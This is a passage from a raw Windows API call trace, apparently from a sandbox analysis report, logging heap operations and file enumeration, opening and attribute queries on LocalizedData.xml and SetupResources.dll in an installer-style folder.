lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0061.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0061.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.029] AreFileApisANSI () returned 1 [0061.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.029] AreFileApisANSI () returned 1 [0061.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0061.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0061.030] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.030] GetFileType (hFile=0x428) returned 0x1 [0061.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.030] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.030] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.030] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.030] CloseHandle (hObject=0x428) returned 1 [0061.030] AreFileApisANSI () returned 1 [0061.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0061.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0061.031] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.031] GetFileType (hFile=0x428) returned 0x1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.031] CloseHandle (hObject=0x428) returned 1 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.031] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.032] AreFileApisANSI () returned 1 [0061.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0061.032] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc)) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.032] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.032] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.032] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.032] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0061.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0061.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.033] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.033] AreFileApisANSI () returned 1 [0061.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.033] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.034] AreFileApisANSI () returned 1 [0061.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0061.034] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.034] GetFileType (hFile=0x428) returned 0x1 [0061.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.034] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.034] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.035] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.035] CloseHandle (hObject=0x428) returned 1 [0061.035] AreFileApisANSI () returned 1 [0061.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0061.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0061.035] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.035] GetFileType (hFile=0x428) returned 0x1 [0061.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.035] CloseHandle (hObject=0x428) returned 1 [0061.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.036] AreFileApisANSI () returned 1 [0061.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0061.036] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0061.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.037] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46440, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䝘")) returned 0 [0061.037] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.037] HeapFree (in: 